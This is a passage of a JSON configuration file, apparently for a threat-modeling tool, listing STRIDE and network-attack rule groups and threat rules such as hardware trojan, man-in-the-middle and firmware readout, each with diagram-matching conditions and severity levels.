Rules","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["48cd5ba9-d234-442e-aebb-0011005f806d","cb3d7440-5d0f-482a-93cb-5ae9c625e31d","3459508a-9169-41ce-8e3a-6ea968023a3a","821594a6-02e5-4a15-9a72-9cca5b57ee92","7cfa63f6-262b-4da3-aa88-6478522b45c5","5c21d6b7-2390-4f72-b29e-7d7985a30293","13b5172b-9d6c-49a3-9580-fb256d5cd506","ddfef636-378c-4874-b2ea-33b0fcfe22c5","32dab43f-2dc8-4109-9420-ee7c118a82d5","4609cf84-96fa-4054-bf45-5b33993ce648","1d39d1b0-8f3c-40f7-bb6d-f7699b3b4b07","358f4f37-445a-4336-8107-c02d7b9cd3a4","2759171a-24e3-4bfe-8ca7-5814902a000e","4c58a730-0161-4385-8249-bbf603ae1b88","af1cd836-48c2-437c-93d0-58b7c9e1d0f6","09881484-9a79-427d-a638-3e894af45c13","5c467e46-e642-49ad-a057-4784ec792125","2af47360-11c3-45e3-a43f-fc3efa8f6f4d","53fc96a4-96a0-42cc-bb2a-fc4515b8b008","9846541d-9bf3-4a2e-98cb-1ad13da5648b","1da12d13-b7ea-4179-8c6b-b87a338d95a5","63fb20c8-4a32-430e-bfa4-587503eaf572","d0736981-7141-4d93-b493-d99135b8d236","2b24dfec-f29a-4682-8066-db29831234ec","e3a2c92b-834f-408e-a4d2-87cfc66bd9fc","834aa7e3-1a0b-47a8-abdc-b4b1a6705377","78a3949d-8677-4426-b2b1-eb20b4296821","12caa9f9-0b1c-4ce0-ac2b-ebee69001b1e","38d27f20-a7ee-40dc-aa6f-b10c98d72409","8597431f-52e2-4d89-bb21-7d34185dbfe6","b8438e31-cc77-4400-86c0-14aa01d411ae","fa055483-b3a2-461f-b09c-46e99de0455e","9ec88af2-3da9-41df-93bf-8cbcb74a7bb6","b41b621c-4b91-43f9-90ab-b7e955269620","08043f24-cc72-435b-ace1-bd593442215d","e8848ea8-e120-4722-bc10-90daf7b4a075","0e783801-b482-4721-af49-1be96b16fc59","512c6921-1b40-4e26-86b5-f66609e57d96","6a9008d4-fa27-46b1-8a11-6dbcecb8b211","e5f4b790-5898-495d-9b51-5a16d452edff","e2529607-c1fd-472d-ad14-c7f2cc719282","a3c2f053-c8d6-4626-ae54-79f87ae171c3","221071ed-1d87-43cc-8052-b615e6ebef04","240eabff-0c74-40e7-9748-d4cc46f59403","ad30b363-be03-41a8-a422-3ad63cb077b1","a727e065-ff95-47d5-8aac-625dfc7a453c","ee25afa7-0267-4f20-96bb-9912494a383e","12c29b20-0467-40ab-9208-2c01d6142eab","063b7019-22aa-4eb8-8e6f-9f81dbeb513b","df2c1c56-e04e-4b33-aae2-e13c9305a370","1cd3c1af-ff49-461f-9f55-fadb851a0893","a1ac559b-0ed9-4e5c-815d-80d6dc23308e","132c57c4-fe66-4c94-95e3-98a67669a4a5","c9be8d05-1ea5-4947-a786-33b505f2c5fd","56e4871b-bcb7-48f6-bd9e-5a8273d0b62c","d9290f90-aa79-432f-92e0-267226771aea","961c5b9f-ea27-48ec-b526-514636536540","b76247eb-309c-4fad-9a8c-28fea0a98555","b9b2fbaa-be5c-48ca-bddc-6d4cb5989f96","ba71d0ae-0a71-40d5-a3e3-f15c3a3baa2b","b05b7085-3952-4f0d-bb85-7c380eb32f92","8d604765-2981-4a70-9cb0-9569411503cc","2b0c94a0-f2c7-4068-86e4-2d5f7ed3fe94","2c32278f-ea97-4aa1-8e85-982f76dee1b9","a777fa41-a13f-4225-af47-e4458a0c8f9e","ab670c99-4f5c-41c7-974c-a6704df1661b","d406176c-9381-4f8c-aecc-b6d7ba56c7da","82c0d2ca-5756-40bd-a2e9-3c7ab8c5c2ba","bd2cf4bb-a728-46bd-8d38-269b4cfef7be","d07d24f4-10b5-452d-a489-10c9752dda4d","6394d7a4-c2db-4fe6-826c-93b1cd0d5373"]},{"ID":"b02f311c-0bb2-4057-9dde-6225ebbf4e1b","Name":"Component Rules","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["8ab20d5d-f624-46f5-beeb-833327d8673f","34b65a9d-ca44-44b0-b66f-aa5bacfc53b4","67919611-8ec3-4d48-bbd7-03f963d6f12c","5585cf20-9e87-4ae5-960a-a952b07c37e5","b3a678a2-87a5-42ae-a1ef-4ec599554471","61452452-9fdc-4023-873d-93cd6d018abb","dde91006-ebc4-4e9c-906b-8c3591266097","a100a6c5-5f38-4224-a74a-825fa89579c2","96876c2e-a3e9-4e0f-afd0-fe721dd0f295","2b389d13-5f71-4bb4-b111-a7fee2b6a486","61e37274-9751-4250-8a4d-6476edc8f732","c54de80f-b548-4432-9ec0-fa3a579be7e6","c6535534-7656-4819-93fe-19d9a78a9390","85b3711a-33d2-4cd2-9c84-471e76cc761c","12c8413b-e1cc-40d6-ae07-6321c5fbf4a0","5aac31c8-fcb7-4d27-8937-e2c9747b83d4","6630ce3a-e21d-467a-b669-99418e95cd8a","6aec11cc-995c-4ee9-a1ce-506b071f3da3","2ee8ccf6-2886-4ebe-81d9-46a408b553a3","f46ae96c-b62c-4fda-955d-6ed55c157c7f","dfac545d-b449-45d0-95bd-a7814b1a97ce","4e5318de-8259-41cd-8704-8842a959b9c6","a904d935-a9d7-45d9-83c8-c403a57e0b80","8340469b-525d-4563-a75d-6ca1d60c7409","d714118d-123d-41b4-8997-63b13a5c09d4","90c71cb6-ec32-4eb6-95ca-20a5d7381fc6","cb711ade-c26b-4500-8337-4eba00d26975","1729c2ac-4dd2-449a-bd8a-ee7c11ff1461","b9caf305-7c53-48c9-beef-2fb2a96cc5b0","778eb19f-8f36-4ce5-aa48-70429386b113","c4df07d3-101f-492e-9f90-70d916f7ed43","b0d13562-1629-4724-bb67-f910157ed1c9","b4c216c0-ccab-4a4d-a156-1b4979dc2aec","c6ac1dcf-ff18-4810-ba64-10aaaf44c135","f51350c5-5401-4276-a8e5-14eba86bc070","e145ffad-ec47-4251-9fa4-1475133db2ff","cf4a11cf-4dee-46ef-8c68-48b5dced2de0","c46dc641-6f0f-4e80-9b80-3833f6c4f2c0","19f1cf08-5ab0-419c-9d56-b5d4d1fc6e24","370351b8-cef2-43bf-89f2-324a814e00a3","df78de64-d35e-474f-be3b-260f60a13fc6","ebf9833c-733d-4356-b390-e754096d0da8","543e017c-8bc2-444e-a3fb-d1dbd52ae21b","a68571c4-61b7-4a33-b5d9-104ef2c06ed0","4f2b98fa-8173-411d-a9b9-2cb0fb31fbde","96661040-05b5-436b-887a-f7864419d691","96208355-0119-41f4-9b93-b0a5781e9ae1","dfc187d5-8287-4c8e-99bc-09cc3e26e201","49344c1a-2368-4a01-a366-023707d0b354","b640f7fb-fb76-4de9-bcf2-0883807f58da","efd73610-90fd-406a-9139-82ff0552bc43","8886f368-618b-4520-a7f5-1db3141da66b","16f2c70d-1752-4e7a-b1ac-5f95710c2778","019f2476-ceca-47ab-b19e-9c2077cc35fe","11975f59-55e0-420f-9366-513175e9236e","1487298b-ff88-4e01-9a60-09b1eaf8a41f","10a258f6-49c0-435e-9a66-630039de0dc8","5d407978-73dc-45c9-8402-db692b42dae4","568a6a24-9109-4f93-b3b3-d3754260387e","5d59dab8-ca08-4359-8e7d-284dcde6d4b7","de96008b-1c59-4319-9b5c-4f5a7e97a122","337c4826-08ed-4c40-9542-54f08317ddb0","eac955da-c90f-4ca8-a1c1-bc186f7f0ad2","1267c02f-4adf-4086-9a9b-c5cc0f81c709","a529a0c3-a98e-41be-80f5-84b876ddddc6","b41315d4-f62d-4133-9a38-be8097a66ebb","50864039-1856-432a-9ff2-0acf3cccd644","d17d5929-ebcd-4c2c-95b6-f7c8ab4c5538","cffa8a3a-ec5b-4e2c-b118-80741e1c8e2a","8bab4292-bca9-4701-8141-a62fc2b2cded","ab8ff926-1147-4597-bded-42fbfb71edb2","135275c4-5523-4a95-a466-47947930377a","dbf5eca4-f98b-443d-b9a1-8113fafc962e","85519ed2-313e-4c85-85fd-f89109f845d4","871318c9-4e0c-4ff4-a475-06195ea4e3bb","bf9e6225-fb28-429a-84f1-fe3be63c3d95","ea2ba48d-b7f9-42c9-b9d9-f4a9816383b0","7f6ca653-a703-480c-b5d8-d82243171994","289c20cd-ea84-4375-8453-b045b94e1dc6","3a44327d-24d1-4c53-a3ea-7d891fb86f47","ea738f65-e0e7-4dc1-93b9-8798c4c8eeaf","6ffb7af3-466f-4cb7-965e-d60956b2ae7e","b2c6473b-9498-4b23-a02f-13e3818496d0","ca66721c-381d-43a1-9129-7643f04065d3","ff998b64-8348-4f41-8350-22ad07c68448","ab1d49fc-cb77-46cf-aeff-b4a28eb0d692","e014189e-5d3c-40c7-aac2-23202be3ccd4","a89ed38a-c36b-445b-a8c2-89e7289cdb9e","104ac1d9-34d6-4ce7-97f1-6d3dedcfbb59","2b82faea-2950-430d-8b52-273d9b0320e2","eaee9e9f-c3d7-42d7-9f8a-3d538cb9a17e","03778e71-e9a1-4528-b1db-547990486b27","359293f9-3fe1-4b61-99cb-332809add1f5","60b7ed0a-97b4-4904-a3bf-6d3ebdf01954","65c95996-5153-4f47-a7cd-0ffe05f96309","23c52b69-1923-416b-99a4-620d36961365","d0a3fe39-6894-44c5-91ec-1f1019ffda37","fdc27962-5622-47e7-8de8-ca1b60009276","d0bd34ae-02d2-46e9-b45a-0130be9713c4","662c14ed-b7cf-490a-97b8-978836d022bb","2d55c643-21db-426a-be29-d21f7f1965a4","3c1166bd-b978-4361-9846-33cd050dd968","42b3d570-e03c-440d-b7a4-87614c6b2e2c","d54bae32-33ff-4b3a-b583-07b53b4c947b","58d38f0f-82b4-4ecb-a95f-237adcfcb58c","cf9cef5a-3e4e-47cd-aa03-22522a1ce3e9","ae2e4063-13cd-414e-811d-3d114365f85f","db9dfe37-7599-4257-a425-e4948ffb8618","4c2aaafd-3248-4b30-b011-cddef8e75876","c68e523a-cba1-41b2-95ce-c8d634fd4396","a40575c4-b39f-4c9e-a4cb-3e15e3f27777","8825c214-9562-4a85-8538-a0530d2b79ee","ef631565-02d7-4f52-a80b-e615224409df","61c1d062-4c94-4af4-bd64-26a632462653","88d04fe9-ac62-4371-89d3-89471ac13027","ca3e9dda-cb0d-4f16-8b14-d0b11e4210cb","d5c0c703-75c1-42dd-a0d0-ca114eb7cdb4","9c362082-55b7-4c48-ac28-e381f5f38a2d","b634e0fe-6f3f-4c75-9df4-98f589d3a3f0","a05007e9-ca76-4584-a7be-47cf4a9625c4","f424f4d3-b3c2-4718-8c5f-ec9b3b6eef74","1a54b8f3-ecd6-4704-9f6c-e05b7e948548","105910c0-a5b5-4496-a2f7-99f11422e4b0","8f8d0183-5a29-451a-bb84-df061c0728d4","b274e8f6-5a0f-4efc-bc4e-40210c2035ad","ea3713af-49ae-4069-8353-78141725af6f","b8d4d723-fe3b-4288-87da-c73fc2412fc5","fa8d45ee-bfc7-47d7-9eed-4b38bc797336","db990108-a992-40e4-b2fc-d4dd00d42431","ac0e3170-0187-47e8-a2ed-6671cc24137e","7d0edcb5-7eff-490e-8d29-db68172ddd20","cc7e24ac-cfc0-4cf8-a291-386735862947","341eaf3e-808c-45de-9445-6be3cc66777b"]},{"ID":"1d995fc2-d7a5-4f46-ae16-954b8603b7fe","Name":"CPDFD Rules","Description":"","threatRuleGroupIDs":["cf6ecec7-3ece-4371-b6cc-976a435023ee","78cbfae0-bbd0-47a5-91ff-223518ffd7b1","4198e708-4e70-41f4-9466-dfc4cc171bfc","27b2bc15-e19c-452e-b096-4f910810e42f","e95a6d53-4e91-412b-ba0e-7a6e2dd5a52b","5d6a6968-e654-4080-91f2-a0755ae8f9e0","85f70a97-fb3a-498b-8402-bcc7f6737f73"],"threatRuleIDs":[]},{"ID":"cf6ecec7-3ece-4371-b6cc-976a435023ee","Name":"Basic Network Attacks","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["8b527d06-5d08-41c1-91fc-1c4146858987","da0924b8-967c-406e-a2f5-a6ebac21de1d","b8e6349e-a52a-4f15-a349-312fc809fbb8","7b825bd7-222e-476f-bf22-85fe2e50eb6c","32d4322f-482d-4a59-8f62-964ef8014a0b","4440ba48-7d42-44cd-b5de-f6664ccc6259","1221dc8c-f495-4833-a027-c3c5d2dc1a7d","ef5ee1a2-c3b4-492d-b7be-d2285f10107c"]},{"ID":"5d6a6968-e654-4080-91f2-a0755ae8f9e0","Name":"STRIDE per Interaction (old)","Description":"According to Adam Shostack: Threat Modeling - Designing for Security","threatRuleGroupIDs":[],"threatRuleIDs":["29d9866c-8a0b-4443-ada2-116171c608f9","5bf95fe6-cca1-45f5-932a-454b16120983","950ae971-fb79-4df0-8df7-0ce1135ff194","6f361cd2-f478-4dad-a669-28ebcf80a5a2","2f6ebd9b-217d-4878-811f-069522e0161f","4f16fe8c-0967-4358-aa77-85d3bff2d8fa","7a18484f-4b3f-49ac-b95e-c963fea9d5d1","d1347b28-467e-4a98-b388-2e0ad6c7b99e","8f0df1ec-6bdc-4371-9f1e-230160e65fe4","a87f7506-1ff6-47db-8c8f-75153d3d8474","dedc4df7-5eab-4e98-aa28-5d16a99b98e7"]},{"ID":"4198e708-4e70-41f4-9466-dfc4cc171bfc","Name":"Implementation Attacks","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["b3450129-f094-4d50-bc87-efb4e8e84a12","4611ab6f-adbf-47f3-86ff-8af0ac645d80","3084a3b9-fdba-4bb1-97fa-c59ddbea7d22"]},{"ID":"27b2bc15-e19c-452e-b096-4f910810e42f","Name":"Physical Link Attacks","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["21c438f5-30d1-4cfc-9deb-78827b036a22","8aa3a3b1-0aff-4e15-ad59-cc40b75dbdbd","14a5667b-7aa9-41ef-82d1-c2a4e8e454aa","94f3da7c-2e51-4025-9521-d91bf790cdea","7892b860-7ed4-4109-ae03-3c290271fef6"]},{"ID":"78cbfae0-bbd0-47a5-91ff-223518ffd7b1","Name":"Advanced Network Attacks","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["8c29ed3b-b151-41de-81ae-627227aaa104"]},{"ID":"e95a6d53-4e91-412b-ba0e-7a6e2dd5a52b","Name":"STRIDE","Description":"","threatRuleGroupIDs":["12b0ec09-b6a6-48b9-8600-fc1816f3fe5f","8d69374e-a6be-40bc-a8b6-1365b3009c25","662f8645-0847-4a94-bd50-14b4615526cc","dd000a59-4eba-47ad-8fa5-4d2909ac5c44"],"threatRuleIDs":[]},{"ID":"12b0ec09-b6a6-48b9-8600-fc1816f3fe5f","Name":"Spoofing","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["6b4eb6d6-a03f-4678-a033-924bd5526f13","c6bc382b-d155-41c4-a41b-959d8a223e54","ab65566e-a317-4e67-b647-d79ac948a62b","87e896bb-eb2e-4481-801b-a11d31a4e5e3","38053480-8db1-4185-adcc-9ebb5b913bef"]},{"ID":"662f8645-0847-4a94-bd50-14b4615526cc","Name":"Repudiation","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["596fe057-9387-4f5c-bd01-ef81613739f4","3517184d-2795-45e8-8dde-667eb7aa8051","df93be9d-b184-4ee1-a1d0-4966c03721fc","8cc8d956-c72b-478c-88ba-e3dd362825a1","6e270c51-65fe-497d-baaa-e390617e27a6"]},{"ID":"dd000a59-4eba-47ad-8fa5-4d2909ac5c44","Name":"Denial of Service","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["b0d91b9a-111b-464b-8011-3e02defafe1d"]},{"ID":"8d69374e-a6be-40bc-a8b6-1365b3009c25","Name":"Tampering","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["fec7c871-d868-4edf-9bca-80c9061e830b"]},{"ID":"85f70a97-fb3a-498b-8402-bcc7f6737f73","Name":"STRIDE-per-Interaction","Description":"According to Adam Shostack: Threat Modeling - Designing for Security","threatRuleGroupIDs":[],"threatRuleIDs":["66f7a456-2edb-4d91-9bd1-aec421a92011","ddc5a2f1-7466-488d-a4f4-9f6a1520a00e","4d724289-8fe3-47c5-b44b-7fd9cac6c701","97682dbc-2fb9-456d-94c3-a6a09998b5a4","9e788439-62ed-44ea-9b19-093f92cf2223","30b01ab6-2eea-49ff-ac4e-f5838f8a8337","4f56c6cd-3daa-4b7a-91a5-740403957ff5","7b140721-9f7a-46a7-8290-931efec07769","557991c1-4eeb-40e1-96c3-c8a214278e29","8fabcdad-c70f-4416-8cb6-5c65a21142b0","f5894534-60a9-4363-84e5-4c0479ca71b9","71f98504-8182-4fb2-81ed-aea1e1953215","6d1d58a3-f4ff-4938-93d8-d91bb9ae3f58","6ca91e1b-746c-47bb-8cd3-2fa0c478042e","a1b5637c-fac3-4b49-bf3f-5f39ce8757da","c0158e50-7c0f-4457-a8ea-223ff165fdaf","984d970a-8ef5-445c-a15b-7613b313306c","a7f340d4-3aa2-45d2-9226-db55414c7f69","2a2ea224-58c9-4187-b721-940fc97b1c04","c1e53b74-7e9d-4566-b690-978bfc8b9af3","35915020-1d0c-4853-849d-d32159bf6401","1308104d-16da-432f-a70f-8de14a8bfbf9","3008afca-320c-489b-9ff6-f61b7cdf497c","46a79465-8cb7-4c8e-8025-e1a08e9620d8","134a6570-e75e-4c8a-bd2f-f02b5a052878","4c4d3f55-3ffd-4416-9bc3-4bf2921110e1","0115bdb1-d2ab-4bbc-bfd1-b23c831b5a70","b06930a0-bff1-49e4-889c-6211290de683","2a171a21-0d62-4159-b7ab-5e2ad1796fff","7e4e6144-6504-4796-a3ca-00962c0a9cbb","d59a4a10-780a-465b-86fa-292a07e7a89a","d675c061-7af1-4e49-a503-0b512a85f9da","427f13f4-ce93-4344-b6fc-1178ea54199e"]}],"threatRules":[{"ID":"48cd5ba9-d234-442e-aebb-0011005f806d","Name":"Hardware trojan","Description":"ToDo","IsActive":true,"Mapping":{"AttackVectorID":"b703d3d9-1f29-480a-b7ad-b11716727a91","ThreatCategoryIDs":["ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"6065e8dd-23c0-4dc9-ad51-628af88f3309","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsCustomDesign","ComparisonType":"==","Value":true}}]},"RuleGenerationType":2,"overridenRuleIDs":[],"Severity":3},{"ID":"b8e6349e-a52a-4f15-a349-312fc809fbb8","Name":"MitM attack","Description":"","IsActive":true,"Mapping":{"AttackVectorID":"e58fcbde-e429-4704-9f22-c00d187994bc","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesConfidentiality","ComparisonType":"==","Value":true}},{"Layer":1,"NodeNumber":-1,"IsOR":true,"RestType":1,"PropertyRest":{"ID":"ProvidesIntegrity","ComparisonType":"==","Value":false}},{"Layer":1,"NodeNumber":-1,"IsOR":true,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}},{"Layer":1,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}],"Target":-1,"AppliesReverse":true},"RuleGenerationType":1,"overridenRuleIDs":[],"Severity":4},{"ID":"29d9866c-8a0b-4443-ada2-116171c608f9","Name":"Process -> Data Store","Description":"Process has outbound data flow to data store.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"5bf95fe6-cca1-45f5-932a-454b16120983","Name":"Process -> Process","Description":"Process sends output to another process.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"950ae971-fb79-4df0-8df7-0ce1135ff194","Name":"Process -> Ext. Entity","Description":"Process sends output to external entity (code).","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"6f361cd2-f478-4dad-a669-28ebcf80a5a2","Name":"Process -> Phy. Ext. Entity","Description":"Process sends output to external entity (human).","IsActive":false,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["03e3750c-8549-4589-8269-e0121b3f26a4"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"2f6ebd9b-217d-4878-811f-069522e0161f","Name":"Process <- Data Store","Description":"Process has inbound data flow from a data store.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","f0e814f3-b3d2-4357-b155-8fffd70ec42e","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"4f16fe8c-0967-4358-aa77-85d3bff2d8fa","Name":"Process <- Process","Description":"Process has inbound data flow from a process.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","a77f314c-f74e-4340-a993-5a1a24f26db4","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"7a18484f-4b3f-49ac-b95e-c963fea9d5d1","Name":"Process <- Ext. Entity","Description":"Process has inbound data flow from a external entity.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"d1347b28-467e-4a98-b388-2e0ad6c7b99e","Name":"Data Store <- Process","Description":"Process has outbound data flow to data store.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["f0e814f3-b3d2-4357-b155-8fffd70ec42e","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"8f0df1ec-6bdc-4371-9f1e-230160e65fe4","Name":"Data Store -> Process","Description":"Process has inbound data flow from data store.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"a87f7506-1ff6-47db-8c8f-75153d3d8474","Name":"Ext. Entity -> Process","Description":"External interactor passes input to process.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"dedc4df7-5eab-4e98-aa28-5d16a99b98e7","Name":"Ext. Entity <- Process","Description":"External interactor gets input from process.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"cb3d7440-5d0f-482a-93cb-5ae9c625e31d","Name":"Uncleared Content","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5656f112-8443-4245-aa38-38cd9d9375e0","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"69401648-0084-45ca-b984-505173c9cdb1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"NewProperty1","ComparisonType":"==","Value":false}}]},"overridenRuleIDs":[],"Severity":2},{"ID":"3459508a-9169-41ce-8e3a-6ea968023a3a","Name":"Physical Side Channels","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"c097b67f-1179-4f30-924c-3a4e54c04d9d","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"e8430761-3c2e-4db0-adbd-5310214574c2","DetailRestrictions":[]},"overridenRuleIDs":[],"Severity":2},{"ID":"821594a6-02e5-4a15-9a72-9cca5b57ee92","Name":"Firmware Readout","Description":"This enables IP theft and allows debugging of binaries to find further vulnerabilities that can be exploited","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"5605adab-044a-4b1f-9344-90a602d8d448","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","70d07015-4eda-4d1a-8d07-1791f881f8f0"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"cf7355d0-6f0c-4ad8-afa2-8689a81e28b8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e8430761-3c2e-4db0-adbd-5310214574c2","ComparisonType":"==","Value":false}}]},"overridenRuleIDs":[],"Severity":3},{"ID":"7cfa63f6-262b-4da3-aa88-6478522b45c5","Name":"Firmware 